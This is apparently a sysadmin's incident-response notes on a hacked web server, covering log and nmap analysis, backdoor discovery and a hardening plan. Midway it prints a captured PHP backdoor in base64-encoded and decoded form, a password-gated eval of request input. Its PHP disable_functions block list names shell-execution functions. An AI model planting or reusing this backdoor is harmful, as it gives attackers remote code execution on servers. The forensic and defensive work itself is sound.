Search procedure
- Log analysis (/var/log)
- Identification of a backdoor (compat.php)
- Code analysis
- Authenticated access with an encoded MD5 password
- Backdoor code was inside function gzinflate(base64_decode(*)) inside the "compat.php" file
- Backdoor analysis (decoding with http://www.decoder-online.com)
- MD5 password : ff6cb56b876eedf90b5bca2c0a210f91
- Nmap analysis from outside :
Not shown: 999 open|filtered ports, 997 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.2 80/tcp open http Apache httpd 2.2.8 ((Unix) PHP/5.2.5) |_http-favicon: Unknown favicon MD5: 3AD8FECBDE088AF038C26EE5A5F40D5B | http-methods: GET HEAD POST OPTIONS TRACE | Potentially risky methods: TRACE |_See http://nmap.org/nsedoc/scripts/http-methods.html |_http-title: Site doesn't have a title (text/html). 8080/tcp closed http-proxy 4672/udp closed rfa
SSH Logs analysis (/var/log/secure)
Detection of locations with : http://www.iplocation.net/index.php
The backdoor
Was giving a total access on th server with a list of known exploits, system access and the list of disabled functions under PHP. So we could say that our hacker was very nice, he could have made a lot of damages if he wanted... Much more than changing our website with "viagra" ads.
Inside /var/www :
grep -R * -e 'gzipinflate(base64'
This command gave me 6 files that was compromised with a copy of the backdoor.
System side
Very old OS version with no updates at all
Very old version of apache web server : 2.0.52 (24 mai 2006)
Application side
Old version of spip, I think the hacker used a common exploit under SPIP to hack the server.
Some basic tasks to detect common things
Use a RootKit detection software like chkrootkit
Web Shell Detector ( https://github.com/emposha/PHP-Shell-Detector)
- Several malicious code discovered
- Code base 64 encoded :
eval(base64_decode('aWYoaXNzZXQoJF9SRVFVRVNUWydjaCddKSAmJiAobWQ1KCRfUkVRVUVTVFsnY2gnXSkgPT0gJzc0MjUzYjUxNjIzNmI1ZmZiZTM1NzFlM2I5MTNiMzZhJykgJiYgaXNzZXQoJF9SRVFVRVNUWydwaHBfY29kZSddKSkgeyBldmFsKCRfUkVRVUVTVFsncGhwX2NvZGUnXSk7IGV4aXQoKTsgfQ=='));
Which translates to :
if(isset($_REQUEST['ch']) && (md5($_REQUEST['ch']) == '74253b516236b5ffbe3571e3b913b36a') && isset($_REQUEST['php_code'])) { eval($_REQUEST['php_code']); exit(); }
Interesting information about this type of code :
http://aw-snap.info/articles/backdoor-examples.php
Emergency action plan
- Block FTP access and just permits 80 or 443 port to the final Web server
- Block IP from suspicious places
- Do a grep search (base64_decode and gzip_inflate) on all the filesystem of the server and remove dangerous script and code
- Then reinstall the server (unique solution to be sure everything is ok again)
- With a recent version of apache (with automatic updates)
- WIth a recent kernel
- If really necessary : ftps (or sftp) access with chroot with a strong policy concerning passwords
- With automatic backup of DocumentRoot on svn (easier to see differences if necessary)
- Remove system commands that are "dangerous" with yum remove or rm for make :
- gcc, make, nc
- Disable PHP functions like "eval" inside php.ini:
- disable_functions=exec,eval,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
New architecture
- Reverse proxy installation with Apache or Nginx in DMZ
- FInal apache server with mod_security and/or mod_evasive
- FTP access inside a reverse proxy with Pydio (formerly ajaxplorer) under SSL
Linux Malware Detect
chmod +x install.php
./install.php
maldet -u
maldet -p
maldet -a /var/www/
maldet --report
maldet --clean 100713-1111.16205
Cron planification of maldet with email in case of Rootkit or Web Shell detection